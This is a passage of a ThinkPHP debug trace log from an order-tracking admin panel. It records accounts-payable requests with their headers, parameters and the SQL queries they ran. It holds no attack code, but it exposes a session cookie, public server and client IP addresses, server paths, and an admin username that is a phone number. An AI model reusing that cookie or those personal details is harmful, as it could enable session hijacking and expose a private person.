'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{}', 'op' => '{}', '_' => '1658308726434', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.002157s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->choosecustom[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000108s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000491s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001437s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000464s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001421s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001318s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001662s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000535s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001454s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001091s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.001148s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.000952s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 0,10 [ RunTime:0.003108s ] --------------------------------------------------------------- [ 2022-07-20T17:18:47+08:00 ] 106.112.205.110 POST /admin/financial/accountspayable/getTotal [ info ] 47.105.33.115:8081/admin/financial/accountspayable/getTotal [运行时间:0.110456s][吞吐率:9.05req/s] [内存消耗:5,438.78kb] [文件加载:87] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000065s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001431s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'getTotal', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '33', 'accept' => '*/*', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'suppliercustomername' => '', 'workername' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001639s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->getTotal[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.006337s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000568s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001544s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000479s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001498s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001107s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.001111s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del,sum(accountspayable.money) as totalMoney FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.001866s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del,sum(accountspayable.paid_money) as totalMoney FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.001894s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001466s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"suppliercustomername\":\"\",\"workername\":\"\"}' , '/admin/financial/accountspayable/getTotal' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308727) [ RunTime:0.003714s ] --------------------------------------------------------------- [ 2022-07-20T17:18:50+08:00 ] 106.112.205.110 POST /admin/financial/accountspayable/getTotal [ info ] 47.105.33.115:8081/admin/financial/accountspayable/getTotal [运行时间:0.067151s][吞吐率:14.89req/s] [内存消耗:5,439.28kb] [文件加载:87] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000059s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001354s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'getTotal', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '51', 'accept' => '*/*', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'suppliercustomername' => '德邦', 'workername' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001792s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->getTotal[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.008045s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000451s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001427s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000362s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001289s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.000945s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.001121s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del,sum(accountspayable.money) as totalMoney FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) AND ( suppliercustomer.name = '德邦' ) LIMIT 1 [ RunTime:0.002108s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del,sum(accountspayable.paid_money) as totalMoney FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) AND ( suppliercustomer.name = '德邦' ) LIMIT 1 [ RunTime:0.001791s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001707s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"suppliercustomername\":\"\\u5fb7\\u90a6\",\"workername\":\"\"}' , '/admin/financial/accountspayable/getTotal' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308730) [ RunTime:0.004745s ] --------------------------------------------------------------- [ 2022-07-20T17:18:50+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=0&limit=10&filter=%7B%22suppliercustomer.name%22%3A%22%E5%BE%B7%E9%82%A6%22%7D&op=%7B%22suppliercustomer.name%22%3A%22%3D%22%7D&_=1658308726435 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=0&limit=10&filter=%7B%22suppliercustomer.name%22%3A%22%E5%BE%B7%E9%82%A6%22%7D&op=%7B%22suppliercustomer.name%22%3A%22%3D%22%7D&_=1658308726435 [运行时间:0.107595s][吞吐率:9.29req/s] [内存消耗:5,688.71kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001256s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'choosecustom', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"suppliercustomer.name":"德邦"}', 'op' => '{"suppliercustomer.name":"="}', '_' => '1658308726435', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001781s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->choosecustom[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000153s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000502s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001385s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000617s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001185s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001179s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001638s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000297s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001257s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001030s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.001011s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE ( `suppliercustomer`.`name` = '德邦' ) AND `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.001123s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE ( `suppliercustomer`.`name` = '德邦' ) AND `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 0,10 [ RunTime:0.001727s ] --------------------------------------------------------------- [ 2022-07-20T17:20:41+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/add?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1 [运行时间:0.055673s][吞吐率:17.96req/s] [内存消耗:5,260.68kb] [文件加载:81] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001200s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'add', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'dialog' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001597s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->add[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/accountspayable/add.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 